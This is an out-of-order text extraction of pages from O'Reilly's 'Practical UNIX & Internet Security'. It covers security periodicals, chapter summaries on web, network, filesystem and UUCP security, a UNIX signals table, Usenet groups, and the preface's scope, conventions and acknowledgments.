http://www.elsevier.nl/catalogue/<br />

Computer & Communications <strong>Sec</strong>urity Reviews<br />

Northgate Consultants Ltd<br />

Ivy Dene<br />

Lode Fen<br />

Cambridge CB5 9HF<br />

England<br />

Fax: +44 223 334678<br />

http://www.cl.cam.ac.uk/users/rja14/#SR<br />

Computer <strong>Sec</strong>urity, Audit & Control<br />

Box 81151<br />

Wellesley Hills, MA 02181<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_02.htm (1 of 3) [2002-04-12 10:45:49]


[Appendix D] D.2 <strong>Sec</strong>urity Periodicals<br />

Voice: +1-617-235-2895<br />

Computer <strong>Sec</strong>urity, Audit & Control<br />

(Law & Protection Report)<br />

P.O. Box 5323<br />

Madison, WI 53705<br />

Voice: +1-608-271-6768<br />

Computer <strong>Sec</strong>urity Alert<br />

Computer <strong>Sec</strong>urity Journal<br />

Computer <strong>Sec</strong>urity Buyers Guide<br />

Computer <strong>Sec</strong>urity Institute<br />

600 Harrison Street<br />

San Francisco, CA 94107<br />

Voice: +1-415-905-2626<br />

http://www.gocsi.com<br />

Disaster Recovery Journal<br />

PO Box 510110<br />

St. Louis, MO 63151<br />

+1 314-894-0276<br />

http://www.drj.com<br />

FBI Law Enforcement Bulletin<br />

Federal Bureau of Investigation<br />

10th and Pennsylvania Avenue<br />

Washington, DC 20535<br />

Voice: +1-202-324-3000<br />

Information Systems <strong>Sec</strong>urity Journal<br />

Auerbach Publications<br />

31 St. James Street<br />

Boston, MA 02116<br />

Voice: +1-800-950-1216<br />

Information Systems <strong>Sec</strong>urity Monitora<br />

U.S. Department of the Treasury<br />

Bureau of the Public Debt<br />

AIS <strong>Sec</strong>urity Branch<br />

200 3rd Street<br />

Parkersburg, WV 26101<br />

Voice: +1-304-480-6355<br />

BBS: +1-304-480-6083<br />

Info<strong>Sec</strong>urity News<br />

498 Concord Street<br />

Framingham, MA 01701<br />

Voice: +1-508-879-9792<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_02.htm (2 of 3) [2002-04-12 10:45:49]


[Appendix D] D.2 <strong>Sec</strong>urity Periodicals<br />

http://www.infosecnews.com/isn/MS7.HTML<br />

A trade magazine that you can probably get for free if you work with security. It is well worth the time<br />

needed to fill out the subscription card!<br />

Journal of Computer <strong>Sec</strong>urity<br />

IOS Press<br />

Van Diemenstraat 94<br />

1013 CN Amsterdam, Netherlands<br />

Fax: +31-20-620-3419<br />

http://www.isse.gmu.edu/~xsis/jcs.html<br />

Police Chief<br />

International Association of Chiefs of Police<br />

110 North Glebe Road, Suite 200<br />

Arlington, VA 22201-9900<br />

Voice: +1-703-243-6500<br />

<strong>Sec</strong>urity Management<br />

American Society for Industrial <strong>Sec</strong>urity<br />

1655 North Fort Meyer Drive, Suite 1200<br />

Arlington, VA 22209<br />

Voice: +1-703-522-5800<br />

Virus Bulletin<br />

Virus Bulletin CTD<br />

Oxon, Engand<br />

Voice: +44-235-555139<br />

North American Distributor:<br />

RG Software Systems<br />

Voice: +1-602-423-8000<br />

http://www.virusbtn.com<br />

D.1 <strong>UNIX</strong> <strong>Sec</strong>urity<br />

References<br />

E. Electronic Resources<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appd_02.htm (3 of 3) [2002-04-12 10:45:49]


[Chapter 18] 18.7 Summary<br />

18.7 Summary<br />

Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

One of the principal goals of good security management is to prevent the disclosure of privileged<br />

information. Running a WWW service implies providing information, quickly and in volume. These two<br />

ideas pose a serious conflict, especially given how recently these services and software have appeared<br />

and how rapidly they are evolving. We have no way of anticipating all the failure modes and problems<br />

these services may bring.<br />

We strongly recommend that you consider running an WWW service on a stripped-down machine that<br />

has been especially designated for that purpose. Put the machine outside your firewall, and let the world<br />

have access to it ... and only to it.<br />

18.6 Dependence on Third<br />

Parties<br />

19. RPC, NIS, NIS+, and<br />

Kerberos<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_07.htm [2002-04-12 10:45:50]


[Chapter 14] 14.2 Serial Interfaces<br />

14.2 Serial Interfaces<br />

Chapter 14<br />

Telephone <strong>Sec</strong>urity<br />

Information inside most computers moves in packets of 8, 16, or 32 bits at a time, using 8, 16, or 32<br />

individual wires. When information leaves a computer, however, it is often divided into a series of single<br />

bits that are transmitted sequentially. Often, these bits are grouped into 8-bit bytes for purposes of error<br />

checking or special encoding. Serial interfaces transmit information as a series of pulses over a single<br />

wire. A special pulse called the start bit signifies the start of each character. The data is then sent down<br />

the wire, one bit at a time, after which another special pulse called the stop bit is sent (see Figure 7.1).<br />

Figure 14.1: A serial interface sending the letter K (ASCII 75)<br />

Because a serial interface can be set up with only three wires (transmit data, receive data, and ground),<br />

it's often used with terminals. With additional wires, serial interfaces can be used to control modems,<br />

allowing computers to make and receive telephone calls.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_02.htm (1 of 2) [2002-04-12 10:45:50]


[Chapter 14] 14.2 Serial Interfaces<br />

14.1 Modems: Theory of<br />

Operation<br />

14.3 The RS-232 Serial<br />

Protocol<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch14_02.htm (2 of 2) [2002-04-12 10:45:50]


[Appendix C] C.3 Signals<br />

C.3 Signals<br />

Appendix C<br />

<strong>UNIX</strong> Processes<br />

Signals are a simple <strong>UNIX</strong> mechanism for controlling processes. A signal is a 5-bit message to a process<br />

that requires immediate attention. Each signal has associated with it a default action; for some signals,<br />

you can change this default action. Signals are generated by exceptions, which include:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Attempts to use illegal instructions<br />

Certain kinds of mathematical operations<br />

Window resize events<br />

Predefined alarms<br />

The user pressing an interrupt key on a terminal<br />

Another program using the kill() l or killpg() system calls<br />

A program running in the background attempting to read from or write to its controlling terminal<br />

A child process calling exit or terminating abnormally<br />

The system default may be to ignore the signal, to terminate the process receiving the signal (and,<br />

optionally, generate a core file), or to suspend the process until it receives a continuation signal. Some<br />

signals can be caught - that is, a program can specify a particular function that should be run when the<br />

signal is received. By design, <strong>UNIX</strong> supports exactly 31 signals. They are listed in the files<br />

/usr/include/signal.h and /usr/include/sys/signal.h. Table 27.4 contains a summary.<br />

Table C.6: <strong>UNIX</strong> Signals<br />

Signal Name Number[7] Key Meaning[8]<br />

SIGHUP 1 Hangup (sent to a process when a modem or network connection is lost)<br />

SIGINT 2 Interrupt (generated by CTRL-C (Berkeley <strong>UNIX</strong>) or RUBOUT<br />

(System V).<br />

SIGQUIT 3 * Quit<br />

SIGILL 4 * Illegal instruction<br />

SIGTRAP 5 * Trace trap<br />

SIGIOT 6 * I/O trap instruction; used on PDP-11 <strong>UNIX</strong><br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_03.htm (1 of 3) [2002-04-12 10:45:50]


[Appendix C] C.3 Signals<br />

SIGEMT 7 * Emulator trap instruction; used on some computers without<br />

floating-point hardware support<br />

SIGFPE 8 * Floating-point exception<br />

SIGKILL 9 ! Kill<br />

SIGBUS 10 * Bus error (invalid memory reference, such as an attempt to read a full<br />

word on a half-word boundary)<br />

SIGSEGV 11 * Segmentation violation (invalid memory reference, such as an attempt<br />

to read outside a process's memory map)<br />

SIGSYS 12 * Bad argument to a system call<br />

SIGPIPE 13 Write on a pipe that has no process to read it<br />

SIGALRM 14 Timer alarm<br />

SIGTERM 15 Software termination signal (default kill signal)<br />

SIGURG 16 @ Urgent condition present<br />

SIGSTOP 17 +! Stop process<br />

SIGTSTP 18 + Stop signal generated by keyboard<br />

SIGCONT 19 @ Continue after stop<br />

SIGCHLD 20 @ Child process state has changed<br />

SIGTTIN 21 + Read attempted from control terminal while process is in background<br />

SIGTTOU 22 + Write attempted to control terminal while process is in background<br />

SIGIO 23 @ Input/output event<br />

SIGXCPU 24 CPU time limit exceeded<br />

SIGXFSZ 25 File size limit exceeded<br />

SIGVTALRM 26 Virtual time alarm<br />

SIGPROF 27 Profiling timer alarm<br />

SIGWINCH 28 @ tty window has changed size<br />

SIGLOST 29 Resource lost<br />

SIGUSR1 30 User-defined signal #1<br />

SIGUSR2 31 User-defined signal #2<br />

[7] The signal number varies on some systems.<br />

[8] The default action for most signals is to terminate.<br />

Key:<br />

* If signal is not caught or ignored, generates a core image dump.<br />

@ Signal is ignored by default.<br />

+ Signal causes process to suspend.<br />

! Signal cannot be caught or ignored.<br />

Signals are normally used between processes for process control. They are also used within a process to<br />

indicate exceptional conditions that should be handled immediately (for example, floating-point<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_03.htm (2 of 3) [2002-04-12 10:45:50]


[Appendix C] C.3 Signals<br />

overflows).<br />

C.2 Creating Processes C.4 The kill Command<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_03.htm (3 of 3) [2002-04-12 10:45:50]


[Chapter 16] 16.5 Summary<br />

16.5 Summary<br />

Chapter 16<br />

TCP/IP Networks<br />

Connecting to a network opens a whole new set of security considerations above and beyond those of<br />

protecting accounts and files. Various forms of network protocols, servers, clients, routers, and other<br />

network components complicate the picture. To be safely connected requires an understanding of how<br />

these components are configured and interact.<br />

Connections to networks with potentially unfriendly users should be done with a firewall in place.<br />

Connections to a local area network that involves only your company or university may not require a<br />

firewall, but still require proper configuration and monitoring.<br />

In later chapters we will discuss some of these other considerations. We cannot provide truly<br />

comprehensive coverage of all the related issues, however, so we encourage you pursue the references<br />

listed in Appendix D.<br />

16.4 Other Network Protocols 17. TCP/IP Services<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch16_05.htm [2002-04-12 10:45:51]


[Chapter 27] 27.4 What All This Means<br />

Chapter 27<br />

Who Do You Trust?<br />

27.4 What All This Means<br />

We haven't presented the material in this chapter to induce paranoia in you, gentle reader. Instead, we<br />

want to get across the point that you need to consider carefully who and what you trust. If you have<br />

information or equipment that is of value to you, you need to think about the risks and dangers that might<br />

be out there. To have security means to trust, but that trust must be well placed.<br />

If you are protecting information that is worth a great deal, attackers may well be willing to invest<br />

significant time and resources to break your security. You may also think you don't have information that<br />

is worth a great deal; nevertheless, you are a target anyway. Why? Your site may be a convenient<br />

stepping stone to another, more valuable site. Or perhaps one of your users is storing information of great<br />

value that you don't know about. Or maybe you simply don't realize how much the information you have<br />

is actually worth. For instance, in the late 1980's, Soviet agents were willing to pay hundreds of<br />

thousands of dollars for copies of the VMS operating system source - the same source that many site<br />

administrators kept in unlocked cabinets in public computer rooms.<br />

To trust, you need to be suspicious. Ask questions. Do background checks. Test code. Get written<br />

assurances. Don't allow disclaimers. Harbor a healthy suspicion of fortuitous coincidences (the FBI<br />

happening to call or that patch tape showing up by FedEx, hours after you discover someone trying to<br />

exploit a bug that the patch purports to fix). You don't need to go overboard, butremember that the best<br />

way to develop trust is to anticipate problems and attacks, and then test for them. Then test again, later.<br />

Don't let a routine convince you that no problems will occur.<br />

If you absorb everything we've written in this book, and apply it, you'll be way ahead of the game.<br />

However, this information is only the first part of a comprehensive security plan. You need to constantly<br />

be accumulating new information, studying your risks, and planning for the future. Complacency is one<br />

of the biggest dangers you can face. As we said at the beginning of the book, <strong>UNIX</strong> can be a secure<br />

system, but only if you understand it and deploy it in a monitored environment.<br />

You can trust us on that.<br />

27.3 Can You Trust People? VII. Appendixes<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_04.htm [2002-04-12 10:45:51]


[Chapter 5] 5.10 Summary<br />

5.10 Summary<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

The <strong>UNIX</strong> filesystem is the primary tool that is used by the <strong>UNIX</strong> operating system for enforcing<br />

computer security. Although the filesystem's concepts of security- - separate access permissions for the<br />

file's user, group, and world - are easy to understand, a <strong>UNIX</strong> system can be very difficult to administer<br />

because of the complexity of getting every single file permission correct.<br />

Because of the attention to detail required by the <strong>UNIX</strong> system, you should use measures beyond the<br />

filesystem to protect your data. One of the best techniques that you can use is encryption, which we<br />

describe in the next chapter.<br />

5.9 Oddities and Dubious<br />

Ideas<br />

6. Cryptography<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_10.htm [2002-04-12 10:45:51]


[Appendix E] E.2 Usenet Groups<br />

E.2 Usenet Groups<br />

Appendix E<br />

Electronic Resources<br />

There are several Usenet newsgroups that you might find to be interesting sources of information on<br />

network security and related topics. However, the unmoderated lists are the same as other unmoderated<br />

groups on the Usenet: repositories of material that is often off-topic, repetitive, and incorrect. Our<br />

warning about material found in mailing lists, expressed earlier, applies doubly to newsgroups.<br />

comp.security.announce (moderated)<br />

Computer security announcements, including new CERT-CC advisories<br />

comp.security.unix<br />

<strong>UNIX</strong> security<br />

comp.security.misc<br />

Miscellaneous computer and network security<br />

comp.security.firewalls<br />

Information about firewalls<br />

comp.virus (moderated)<br />

Information on computer viruses and related topics<br />

alt.security<br />

Alternative discussions of computer and network security<br />

comp.admin.policy<br />

Computer administrative policy issues, including security<br />

comp.protocols.tcp-ip<br />

TCP/IP internals, including security<br />

comp.unix.admin<br />

<strong>UNIX</strong> system administration, including security<br />

comp.unix.wizards<br />

<strong>UNIX</strong> kernel internals, including security<br />

sci.crypt<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_02.htm (1 of 2) [2002-04-12 10:45:51]


[Appendix E] E.2 Usenet Groups<br />

Discussions about cryptology research and application<br />

sci.crypt.research (moderated)<br />

Discussions about cryptology research<br />

comp.society.cu-digest (moderated)<br />

As described above<br />

comp.risks (moderated)<br />

As described above<br />

E.1 Mailing Lists E.3 WWW Pages<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appe_02.htm (2 of 2) [2002-04-12 10:45:51]


[Chapter 15] 15.9 Summary<br />

15.9 Summary<br />

Chapter 15<br />

UUCP<br />

Although UUCP can be made relatively secure, most versions of UUCP, as distributed by vendors, are<br />

not. If you do not intend to use UUCP, you may wish to delete (or protect) the UUCP system altogether.<br />

If you are not running UUCP, check the permissions on the uucppublic directory, and set them to 0.<br />

If you do use UUCP:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Be sure that the UUCP control files are protected and cannot be read or modified using the UUCP<br />

program.<br />

Only give uucp access to the directories to which it needs access. You may wish to limit uucp to<br />

the directory /usr/spool/uucppublic.<br />

If possible, assign a different login to each UUCP site.<br />

Consider using callback on your connections.<br />

Limit the commands which can be executed from off-site to those that are absolutely necessary.<br />

Disable or delete any uucpd daemon if you aren't using it.<br />

Remove all of the UUCP software and libraries if you aren't going to use them.<br />

Be sure to add all uucp accounts to the ftpusers restriction file.<br />

15.8 UUCP Over Networks 16. TCP/IP Networks<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_09.htm [2002-04-12 10:45:52]


[Preface] Scope of This Book<br />

Scope of This Book<br />

Preface<br />

This book is divided into six parts; it includes 27 chapters and 7 appendixes.<br />

Part I, Computer <strong>Sec</strong>urity Basics, provides a basic introduction to security policy. The chapters are<br />

written to be accessible to both users and administrators.<br />

Chapter 1, Introduction, provides a history of the <strong>UNIX</strong> operating system and an introduction to <strong>UNIX</strong><br />

security. It also introduces basic terms we use throughout the book.<br />

Chapter 2, Policies and Guidelines, examines the role of setting good policies to guide protection of your<br />

systems. It also describes the trade-offs that must be made to account for cost, risk, and corresponding<br />

benefits.<br />

Part II, User Responsibilities, provides a basic introduction to <strong>UNIX</strong> host security. The chapters are<br />

written to be accessible to both users and administrators.<br />

Chapter 3 is about <strong>UNIX</strong> user accounts. It discusses the purpose of passwords, explains what makes good<br />

and bad passwords, and describes how the crypt( ) password encryption system works.<br />

Chapter 4, Users, Groups, and the Superuser, and the Superuser, describes how <strong>UNIX</strong> groups can be<br />

used to control access to files and devices. It also discusses the <strong>UNIX</strong> superuser and the role that special<br />

users play.<br />

Chapter 5, The <strong>UNIX</strong> Filesystem, discusses the security provisions of the <strong>UNIX</strong> filesystem and tells how<br />

to restrict access to files and directories to the file's owner, to a group of people, or to everybody on the<br />

computer system.<br />

Chapter 6, Cryptography, discusses the role of encryption and message digests in your security. It<br />

includes a discussion of several popular encryption schemes, including the PGP mail package<br />

Part III, System <strong>Sec</strong>urity, is directed primarily towards the <strong>UNIX</strong> system administrator. It describes how<br />

to configure <strong>UNIX</strong> on your computer to minimize the chances of a break-in, as well as to limit the<br />

opportunities for a nonprivileged user to gain superuser access.<br />

Chapter 7, Backups, discusses how and why to make archival backups of your storage. It includes<br />

discussions of backup strategies for different types of organizations.<br />

Chapter 8, Defending Your Accounts, describes ways that a computer cracker might try to initially break<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_02.htm (1 of 4) [2002-04-12 10:45:53]


[Preface] Scope of This Book<br />

into your computer system. By knowing these "doors" and closing them, you increase the security of<br />

your system.<br />

Chapter 9, Integrity Management, discusses how to monitor your filesystem for unauthorized changes.<br />

This includes coverage of the use of message digests and read-only disks, and the configuration and use<br />

of the Tripwire utility.<br />

Chapter 10, Auditing and Logging, discusses the logging mechanisms that <strong>UNIX</strong> provides to help you<br />

audit the usage and behavior of your system.<br />

Chapter 11, Protecting Against Programmed Threats, is about computer viruses, worms, and Trojan<br />

horses. This chapter contains detailed tips that you can use to protect yourself from these electronic<br />

vermin.<br />

Chapter 12, Physical <strong>Sec</strong>urity. What if somebody gets frustrated by your super-secure system and<br />

decides to smash your computer with a sledgehammer? This chapter describes physical perils that face<br />

your computer and its data and discusses ways of protecting them.<br />

Chapter 13, Personnel <strong>Sec</strong>urity, examines concerns about who you employ and how they fit into your<br />

overall security scheme.<br />

Part IV, Network and <strong>Internet</strong> <strong>Sec</strong>urity, is about the ways in which individual <strong>UNIX</strong> computers<br />

communicate with one another and the outside world, and the ways that these systems can be subverted<br />

by attackers to break into your computer system. Because many attacks come from the outside, this part<br />

of the book is vital reading for anyone whose computer has outside connections.<br />

Chapter 14, Telephone <strong>Sec</strong>urity, describes how modems work and provides step-by-step instructions for<br />

testing your computer's modems to see if they harbor potential security problems.<br />

Chapter 15, UUCP, is about the <strong>UNIX</strong>-to-<strong>UNIX</strong> copy system, which can use standard phone lines to<br />

copy files, transfer electronic mail, and exchange news. This chapter explains how UUCP works and tells<br />

you how to make sure that it can't be subverted to damage your system.<br />

Chapter 16, TCP/IP Networks, provides background on how TCP/IP networking programs work and<br />

describes the security problems they pose.<br />

Chapter 17, TCP/IP Services, discusses the common IP network services found on <strong>UNIX</strong> systems,<br />

coupled with common problems and pitfalls.<br />

Chapter 18, WWW <strong>Sec</strong>urity, describes some of the issues involved in running a World Wide Web server<br />

without opening your system to security problems. The issues discussed here should also be borne in<br />

mind when operating any other kind of network-based information server.<br />

Chapter 19, RPC, NIS, NIS+, and Kerberos, discusses a variety of network information services. It<br />

covers some of how they work, and common pitfalls.<br />

Chapter 20, NFS, describes how Sun Microsystems' Network Filesystem works and its potential security<br />

problems.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_02.htm (2 of 4) [2002-04-12 10:45:53]


[Preface] Scope of This Book<br />

Part V, Advanced Topics, discusses issues that arise when organizational networks are interconnected<br />

with the <strong>Internet</strong>. It also covers ways of increasing your security through better programming.<br />

Chapter 21, Firewalls, describes how to set up various types of firewalls to protect an internal network<br />

from an external attacker.<br />

Chapter 22, Wrappers and Proxies, describes a few common wrapper and proxying programs to help<br />

protect your machine and the programs within it without requiring access to source code.<br />

Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs, describes common pitfalls when writing your<br />

own software. It gives tips on how to write robust software that will resist attack from malicious users.<br />

Part VI, Handling <strong>Sec</strong>urity Incidents, contains instructions about what to do if your computer's security is<br />

compromised. This part of the book will also help system administrators protect their systems from<br />

authorized users who are misusing their privileges.<br />

Chapter 24, Discovering a Break-in, contains step-by-step directions to follow if you discover that an<br />

unauthorized person is using your computer.<br />

Chapter 25, Denial of Service Attacks and Solutions, describes ways that legitimate, authorized users can<br />

make your system inoperable, ways that you can find out who is doing what, and what to do about it.<br />

Chapter 26, Computer <strong>Sec</strong>urity and U.S. Law. Occasionally the only thing you can do is sue or try to<br />

have your attackers thrown into jail. This chapter describes the legal recourse you may have after a<br />

security breach and discusses why legal approaches are often not helpful. It also covers some emerging<br />

concerns about running server sites connected to a wide area network such as the <strong>Internet</strong>.<br />

Chapter 27, Who Do You Trust?, is the concluding chapter that makes the point that somewhere along<br />

the line, you need to trust a few things, and people. However, are you trusting the right ones?<br />

Part VII, Appendixes, contains a number of useful lists and references.<br />

Appendix A, <strong>UNIX</strong> <strong>Sec</strong>urity Checklist, contains a point-by-point list of many of the suggestions made in<br />

the text of the book.<br />

Appendix B, Important Files, is a list of the important files in the <strong>UNIX</strong> filesystem and a brief discussion<br />

of their security implications.<br />

Appendix C, <strong>UNIX</strong> Processes, is a technical discussion of how the <strong>UNIX</strong> system manages processes. It<br />

also describes some of the special attributes of processes, including the UID, GID, and SUID.<br />

Appendix D lists books, articles, and magazines about computer security.<br />

Appendix E, Electronic Resources, is a brief listing of some significant security tools to use with <strong>UNIX</strong>,<br />

including directions on where to find them on the <strong>Internet</strong>.<br />

Appendix F, Organizations, contains the names, telephone numbers, and addresses of organizations that<br />

are devoted to seeing computers become more secure.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_02.htm (3 of 4) [2002-04-12 10:45:53]


[Preface] Scope of This Book<br />

Appendix G, Table of IP Services, lists all of the common TCP/IP protocols, along with their port<br />

numbers and suggested handling by a firewall.<br />

<strong>UNIX</strong> "<strong>Sec</strong>urity"? Which <strong>UNIX</strong> System?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_02.htm (4 of 4) [2002-04-12 10:45:53]


[Preface] Conventions Used in This Book<br />

Preface<br />

Conventions Used in This Book<br />

The following conventions are used in this book:<br />

Italic is used for <strong>UNIX</strong> file, directory, user, command, and group names and for system calls, passwords,<br />

and URLs. It is also used to emphasize new terms and concepts when they are introduced.<br />

Constant Width is used for code examples and any system output.<br />

Constant Width Italic is used in examples for variable input or output (e.g., a filename).<br />

Constant Width Bold is used in examples for user input.<br />

Strike-through is used in examples to show input typed by the user that is not echoed by the computer.<br />

This is mainly used for passwords and passphrases that are typed.<br />

call ( ) is used to indicate a system call, in contrast to a command. In the original edition of the book, we<br />

referred to commands in the form command (1) and to calls in the form call (2) or call (3), where the<br />

number indicates the section of the <strong>UNIX</strong> programmer's manual in which the command or call is<br />

described. Because different vendors now have diverged in their documentation section numbering, we<br />

do not use this convention in this second edition of the book. (Consult your own documentation index for<br />

the right section.) The call ( ) convention is helpful in differentiating, for example, between the crypt<br />

command and the crypt ( ) library function.<br />

% is the <strong>UNIX</strong> C shell prompt.<br />

$ is the <strong>UNIX</strong> Bourne shell or Korn shell prompt.<br />

# is the <strong>UNIX</strong> superuser prompt (Korn, Bourne, or C shell). We usually use this for examples that should<br />

be executed by root.<br />

Normally, we will use the Bourne or Korn shell in our examples unless we are showing something that is<br />

unique to the C shell.<br />

[ ] surround optional values in a description of program syntax. (The brackets themselves should never<br />

be typed.)<br />

CTRL-X or ^X indicates the use of control characters. It means hold down the CONTROL key while<br />

typing the character "X."<br />

All command examples are followed by RETURN unless otherwise indicated.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_04.htm (1 of 2) [2002-04-12 10:45:53]


[Preface] Conventions Used in This Book<br />

Which <strong>UNIX</strong> System? Online Information<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_04.htm (2 of 2) [2002-04-12 10:45:53]


[Preface] Online Information<br />

Online Information<br />

Preface<br />

Examples and other online information related to this book are available on the World Wide Web and via<br />

anonymous FTP. See the insert in the book for information about all of <strong>O'Reilly</strong>'s online services.<br />

Conventions Used in This<br />

Book<br />

Acknowledgments<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_05.htm [2002-04-12 10:45:53]


[Preface] Acknowledgments<br />

Acknowledgments<br />

Preface<br />

We have many people to thank for their help on the original book and on this very substantial revision of<br />

that original book.<br />

First Edition<br />

The first edition of this book originally began as a suggestion by Victor Oppen-heimer, Deborah Russell,<br />

and Tim <strong>O'Reilly</strong> at <strong>O'Reilly</strong> & Associates.<br />

Our heartfelt thanks to those people who reviewed the manuscript of the first edition in depth: Matt<br />

Bishop (UC Davis), Bill Cheswick, Andrew Odlyzko, and Jim Reeds (AT&T Bell Labs) (thanks also to<br />

Andrew and to Brian LaMacchia for criticizing the section on network security in an earlier draft as<br />

well), Paul Clark (Trusted Information Systems), Tom Christiansen (Convex Computer Corporation),<br />

Brian Kantor (UC San Diego), Laurie Sefton (Apple), Daniel Trinkle (Purdue's Department of Computer<br />

Sciences), Beverly Ulbrich (Sun Microsystems), and Tim <strong>O'Reilly</strong> and Jerry Peek (<strong>O'Reilly</strong> &<br />

Associates). Thanks also to Chuck McManis and Hal Stern (Sun Microsystems), who reviewed the<br />

chapters on NFS and NIS. We are grateful for the comments by Assistant U.S. Attorney William Cook<br />

and by Mike Godwin (Electronic Frontier Foundation) who both reviewed the chapter on the law. Fnz<br />

Jntfgnss (Purdue) provided very helpful feedback on the chapter on encryption-gunaxf! Steve Bellovin<br />

(AT&T), Cliff Stoll (Smithsonian), Bill Cook, and Dan Farmer (CERT) all provided moral support and<br />

helpful comments. Thanks to Jan Wortelboer, Mike Sullivan, John Kinyon, Nelson Fernandez, Mark<br />

Eichin, Belden Menkus, and Mark Hanson for finding so many typos! Thanks as well to Barry Z. Shein<br />

(Software Tool and Die) for being such an icon and <strong>UNIX</strong> historian. Steven Wadlow provided the<br />

pointer to Lazlo Hollyfeld. The quotations from Dennis Ritchie are from an interview with Simson<br />

Garfinkel that occurred during the summer of 1990.<br />

Many people at <strong>O'Reilly</strong> & Associates helped with the production of the first edition of the book. Debby<br />

Russell edited the book. Rosanne Wagger and Kismet McDonough did the copyediting and production.<br />

Chris Reilley developed the figures. Edie Freedman designed the cover and the interior design. Ellie<br />

Cutler produced the index.<br />

Special thanks to Kathy Heaphy, Gene Spafford's long-suffering and supportive wife, and to Georgia<br />

Conarroe, his secretary at Purdue University's Department of Computer Science, for their support while<br />

we wrote the first edition.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/prf1_06.htm (1 of 3) [2002-04-12 10:45:54]


[Preface] Acknowledgments<br />

<strong>Sec</strong>ond Edition<br />

We are grateful to everyone who helped us develop the second edition of this book. The book, and the<br />

amount of work required to complete it, ended up being much larger than we originally envisioned. We<br />

started the rewrite of this book in January 1995; we finished it in March 1996, many months later than<br />

we had intended.<br />

Our thanks to the people at Purdue University in the Computer Sciences Department and the COAST<br />

Laboratory who read and reviewed early drafts of this book: Mark Crosbie, Bryn Dole, Adam Hammer,<br />

Ivan Krsul, Steve Lodin, Dan Trinkle, and Keith A. Watson; Sam Wagstaff also commented on<br />

individual chapters.<br />

Thanks to our technical reviewers: Fred Blonder (NASA), Brent Chapman (Great Circle Associates),<br />

Michele Crabb (NASA), James Ellis (CERT/CC), Dan Farmer (Sun), Eric Halil (AUSCERT), Doug<br />

Hosking (Systems Solutions Group), Tom Longstaff (CERT/CC), Danny Smith (AUSCERT), Jan<br />

Wortelboer (University of Amsterdam), David Waitzman (BBN), and Kevin Ziese (USAF). We would<br />

also like to thank our product-specific reviewers, who made a careful reading of the text to identify<br />

problems and add content applicable to particular <strong>UNIX</strong> versions or products. They are C.S. Lin (HP),<br />

